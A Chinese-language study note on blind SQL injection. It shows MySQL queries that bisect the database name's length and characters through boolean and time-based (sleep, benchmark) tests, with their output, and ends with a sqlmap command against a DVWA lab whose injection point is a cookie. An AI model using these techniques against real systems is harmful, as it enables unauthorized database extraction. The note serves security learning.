sql盲注-笔记

 盲注是因为数据库查询的结果不会直接显示在页面。只能通过构造查询语句查看反馈的结果真&假状态来判断信息。

 

实际注入手法和回显注入区别不大

下面只记录相关思路

 

select length('test'); 查看字符串长度

二分法判断数据库名字的长度

mysql> select length(database())>10;

+-----------------------+

| length(database())>10 |

+-----------------------+

|                     0 |

+-----------------------+

1 row in set (0.00 sec)

 

mysql> select length(database())>5;

+----------------------+

| length(database())>5 |

+----------------------+

|                    0 |

+----------------------+

1 row in set (0.00 sec)

 

mysql> select length(database())>3;

+----------------------+

| length(database())>3 |

+----------------------+

|                    1 |

+----------------------+

1 row in set (0.00 sec)

 

mysql> select length(database())=4;

+----------------------+

| length(database())=4 |

+----------------------+

|                    1 |

+----------------------+

1 row in set (0.00 sec)

 

mysql> select substr(database(),1,1);

+------------------------+

| substr(database(),1,1) |

+------------------------+

| d                      |

+------------------------+

1 row in set (0.00 sec)

 

mysql> select ascii(substr(database(),1,1))>64;

+----------------------------------+

| ascii(substr(database(),1,1))>64 |

+----------------------------------+

|                                1 |

+----------------------------------+

1 row in set (0.00 sec)

 

mysql> select ascii(substr(database(),1,1))>100;

+-----------------------------------+

| ascii(substr(database(),1,1))>100 |

+-----------------------------------+

|                                 0 |

+-----------------------------------+

1 row in set (0.00 sec)

 

mysql> select ascii(substr(database(),1,1))>80;

+----------------------------------+

| ascii(substr(database(),1,1))>80 |

+----------------------------------+

|                                1 |

+----------------------------------+

1 row in set (0.00 sec)

 

mysql> select ascii(substr(database(),1,1))>90;

+----------------------------------+

| ascii(substr(database(),1,1))>90 |

+----------------------------------+

|                                1 |

+----------------------------------+

1 row in set (0.00 sec)

 

mysql> select ascii(substr(database(),1,1))>95;

+----------------------------------+

| ascii(substr(database(),1,1))>95 |

+----------------------------------+

|                                1 |

+----------------------------------+

1 row in set (0.00 sec)

 

mysql> select ascii(substr(database(),1,1))>97;

+----------------------------------+

| ascii(substr(database(),1,1))>97 |

+----------------------------------+

|                                1 |

+----------------------------------+

1 row in set (0.00 sec)

 

mysql> select ascii(substr(database(),1,1))>98;

+----------------------------------+

| ascii(substr(database(),1,1))>98 |

+----------------------------------+

|                                1 |

+----------------------------------+

1 row in set (0.00 sec)

 

mysql> select ascii(substr(database(),1,1))>99;

+----------------------------------+

| ascii(substr(database(),1,1))>99 |

+----------------------------------+

|                                1 |

+----------------------------------+

1 row in set (0.00 sec)

 

mysql> select ascii(substr(database(),1,1))=100;

+-----------------------------------+

| ascii(substr(database(),1,1))=100 |

+-----------------------------------+

|                                 1 |

+-----------------------------------+

1 row in set (0.00 sec)

 

使用二分法判断出数据库第一个字母ascii码为100 对应的字母为小写d

 

另外盲注还可以通过延时来判断

mysql> select sleep(if(length(database())=4,3,0));

+-------------------------------------+

| sleep(if(length(database())=4,3,0)) |

+-------------------------------------+

|                                   0 |

+-------------------------------------+

1 row in set (3.00 sec)

 

mysql> select sleep(if(length(database())=5,3,0));

+-------------------------------------+

| sleep(if(length(database())=5,3,0)) |

+-------------------------------------+

|                                   0 |

+-------------------------------------+

1 row in set (0.00 sec)

 

mysql> select sleep(if(length(database())=5,3,0));  

通过响应返回的延时来判断信息是否正确

 

也可以用 benchmark重复执行命令函数来进行延时

mysql> select benchmark(50000,md5('test'));

 

+------------------------------+

| benchmark(50000,md5('test')) |

+------------------------------+

|                            0 |

+------------------------------+

1 row in set (0.02 sec)

 

mysql> select benchmark(5000000,md5('test'));

+--------------------------------+

| benchmark(5000000,md5('test')) |

+--------------------------------+

|                              0 |

+--------------------------------+

1 row in set (1.45 sec)

 

 

DVWA high难度

python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli_blind/" -p "id" --cookie "PHPSESSID=dv9h9urfu9bf9udkd7ih6qdbj3;id=1;security=high" --level 2

查询字段在cookie内  需要设置--level 2